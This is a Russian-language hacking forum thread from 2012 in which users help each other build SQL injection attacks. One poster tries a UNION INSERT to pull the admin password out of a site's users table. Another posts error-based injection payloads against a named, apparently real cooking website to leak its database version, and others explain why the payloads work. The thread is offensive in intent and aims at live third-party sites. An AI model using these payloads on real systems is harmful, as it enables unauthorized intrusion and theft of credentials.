 |
|
22.03.2012, 11:39
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Pirotexnik
хм, действительно. Спасибо.
Но в большинстве случае шелл заливается с того же юзера, что и апач.
единственное, что не во всех случаях разрешено этому пользователю создавать исполняемые пхп скрипты.
|
|
|
22.03.2012, 21:11
|
|
Новичок
Регистрация: 22.03.2012
Сообщений: 2
С нами:
7442966
Репутация:
0
|
|
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
|
|
|
|
22.03.2012, 22:08
|
|
Познающий
Регистрация: 06.11.2010
Сообщений: 86
С нами:
8165846
Репутация:
-6
|
|
Сообщение от iProtoss
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
что-то вообще ничего понять не могу
в mysql нельзя писать union insert, если ты об этом
|
|
|
|
22.03.2012, 22:53
|
|
Новичок
Регистрация: 20.02.2012
Сообщений: 1
С нами:
7487606
Репутация:
0
|
|
Сообщение от iProtoss
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
Попробуй это
http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
А вообще, лучше бы ты линк скинул.
|
|
|
|
23.03.2012, 13:01
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Melfis
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
народ. что ети функции делают я понимаю, непойму почему они заставляют вывоится инфу, кто может обьяснить?
|
|
|
|
23.03.2012, 13:04
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Сообщение от qaz
народ. что ети функции делают я понимаю, непойму почему они заставляют вывоится инфу, кто может обьяснить?
FLOOR(RAND(0)*2) - Эта функция заставляет скрипт выводить ошибку.
|
|
|
|
23.03.2012, 13:07
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от aydin-ka
FLOOR(RAND(0)*2) - Эта функция заставляет скрипт выводить ошибку.
не, ну ето я уже знаю
но вот например так не выводит
http://sibkulinar.ru/placecooking.php?id=2%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+
а так выводит
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
почему?
|
|
|
|
23.03.2012, 13:10
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от qaz
не, ну ето я уже знаю
но вот например так не выводит
http://sibkulinar.ru/placecooking.php?id=2%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+
а так выводит
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
почему?
потому что это блайнд. и в данном случае результат запроса возвращается в ошибке. т.е. для эксплутации нам нужно вызвать ошибку и вывести через неё данные. вот и вся суть error based'a.
|
|
|
|
23.03.2012, 13:25
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от d1v
потому что это блайнд. и в данном случае результат запроса возвращается в ошибке. т.е. для эксплутации нам нужно вызвать ошибку и вывести через неё данные. вот и вся суть error based'a.
хм... неочень понятно,
допустим тут разве результат запроса не возвращается в ошибке? ведь тут тоже вызваем ошибку и выводим через неё данные
+or+1+group+by+concat((select+version()),0x00,floo r(rand(0)*2))having+min(0)+or+1--+
или нет?
|
|
|
|
23.03.2012, 13:30
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
С нами:
8998242
Репутация:
2
|
|
Сообщение от qaz
хм... неочень понятно,
допустим тут разве результат запроса не возвращается в ошибке? ведь тут тоже вызваем ошибку и выводим через неё данные
+or+1+group+by+concat((select+version()),0x00,floo r(rand(0)*2))having+min(0)+or+1--+
или нет?
http://www.xakep.ru/post/52222/ - почитай эту статейку, думаю все станет ясно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
